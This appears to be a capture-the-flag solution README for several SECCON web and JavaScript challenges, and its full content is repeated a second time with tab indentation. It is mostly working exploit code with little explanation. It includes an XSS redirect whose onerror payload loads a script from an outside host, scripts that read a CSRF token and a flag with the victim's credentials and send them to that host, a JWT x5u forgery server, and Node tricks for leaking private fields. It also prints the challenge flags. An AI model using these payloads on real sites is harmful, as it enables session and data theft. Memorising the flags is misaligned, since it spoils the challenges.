shpik-kr/beginners-capsule

## beginners-capsule
var __classPrivateFieldSet = function(receiver, privateMap, value) {
        if (!privateMap.has(receiver)) {
            throw new TypeError(
                "attempted to set private field on non-instance"
            );
        }
        privateMap.set(receiver, value);
        console.log(privateMap.get(flag));
        return value;
    };

new Flag("1234")

// SECCON{Player_WorldOfFantasy_StereoWorXxX_CapsLock_WaveRunner}

## capsule
const util = require('util');
const inspector = require('inspector');
const session = new inspector.Session();
session.connect();
this.__proto__.aa= flag;


session.post('Runtime.evaluate', {
    expression: `aa;`
}, (error, { result }) => {
    console.log(result);
    session.post('Runtime.getProperties',
    { objectId: result.objectId },
    (error, { privateProperties }) => {
        console.log('private properties', privateProperties);
    });
});

// SECCON{HighCollarGirl_CutieCinem@Replay_PhonyPhonic_S.F.SoundFurniture}

## milk and milk revenge
# index.html (for reporting)
<script>
location.href="https://milk-revenge.chal.seccon.jp/note.php/..;/note.php?id=5f820da700115b0700127762&_=a%20onerror=$.getScript(%27https://lab.mashiro.kr/bb.js%27);";
</script>

# aa.js
var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (xhr.readyState === xhr.DONE) {let xhr2 = new XMLHttpRequest();xhr2.open('GET', 'https://lab.mashiro.kr/?c='+xhr.responseText);xhr2.send();};};xhr.withCredentials=true;xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/csrf-token?_=aaaaaaaaaaaaaaaaaaaaaaaaaaaa');xhr.send();

# bb.js
var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (xhr.readyState === xhr.DONE) {let xhr2 = new XMLHttpRequest();xhr2.open('GET', 'https://lab.mashiro.kr/?c='+xhr.responseText);xhr2.send();};};xhr.withCredentials=true;xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/notes/flag?token=c5fe8848-9278-404f-9dfe-2ede7f41077c');xhr.send();

milk: SECCON{I_am_heavily_concerning_about_unintended_sols_so_I_dont_put_any_spoiler_here_but_anyway_congrats!}
milk revenge: SECCON{Okay_there_was_actually_unintended_solution_as_I_intended_blahblah}

## pasta
1. make jwt and signing any private key
2. change x5u url as below server on running app.py
3. get flag: SECCON{1_w0uLd_L1K3_70_347_r4M3N_1N5734d_0f_p4574}

# app.py
from flask import Flask

c = False
app = Flask(__name__)

@app.route("/root.crt")
def aa():
    global c
    if c == False:
        c = True
        with open("root.crt") as f:
            q = f.read()
        return q
    else:
        c = False
        print "hello"

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=2368, debug=True)
	var __classPrivateFieldSet = function(receiver, privateMap, value) {
	if (!privateMap.has(receiver)) {
	throw new TypeError(
	"attempted to set private field on non-instance"
	);
	}
	privateMap.set(receiver, value);
	console.log(privateMap.get(flag));
	return value;
	};

	new Flag("1234")

	// SECCON{Player_WorldOfFantasy_StereoWorXxX_CapsLock_WaveRunner}
	const util = require('util');
	const inspector = require('inspector');
	const session = new inspector.Session();
	session.connect();
	this.__proto__.aa= flag;


	session.post('Runtime.evaluate', {
	expression: `aa;`
	}, (error, { result }) => {
	console.log(result);
	session.post('Runtime.getProperties',
	{ objectId: result.objectId },
	(error, { privateProperties }) => {
	console.log('private properties', privateProperties);
	});
	});

	// SECCON{HighCollarGirl_CutieCinem@Replay_PhonyPhonic_S.F.SoundFurniture}
	# index.html (for reporting)
	<script>
	location.href="https://milk-revenge.chal.seccon.jp/note.php/..;/note.php?id=5f820da700115b0700127762&_=a%20onerror=$.getScript(%27https://lab.mashiro.kr/bb.js%27);";
	</script>

	# aa.js
	var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (xhr.readyState === xhr.DONE) {let xhr2 = new XMLHttpRequest();xhr2.open('GET', 'https://lab.mashiro.kr/?c='+xhr.responseText);xhr2.send();};};xhr.withCredentials=true;xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/csrf-token?_=aaaaaaaaaaaaaaaaaaaaaaaaaaaa');xhr.send();

	# bb.js
	var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (xhr.readyState === xhr.DONE) {let xhr2 = new XMLHttpRequest();xhr2.open('GET', 'https://lab.mashiro.kr/?c='+xhr.responseText);xhr2.send();};};xhr.withCredentials=true;xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/notes/flag?token=c5fe8848-9278-404f-9dfe-2ede7f41077c');xhr.send();

	milk: SECCON{I_am_heavily_concerning_about_unintended_sols_so_I_dont_put_any_spoiler_here_but_anyway_congrats!}
	milk revenge: SECCON{Okay_there_was_actually_unintended_solution_as_I_intended_blahblah}
	1. make jwt and signing any private key
	2. change x5u url as below server on running app.py
	3. get flag: SECCON{1_w0uLd_L1K3_70_347_r4M3N_1N5734d_0f_p4574}

	# app.py
	from flask import Flask

	c = False
	app = Flask(__name__)

	@app.route("/root.crt")
	def aa():
	global c
	if c == False:
	c = True
	with open("root.crt") as f:
	q = f.read()
	return q
	else:
	c = False
	print "hello"

	if __name__ == "__main__":
	app.run(host="0.0.0.0", port=2368, debug=True)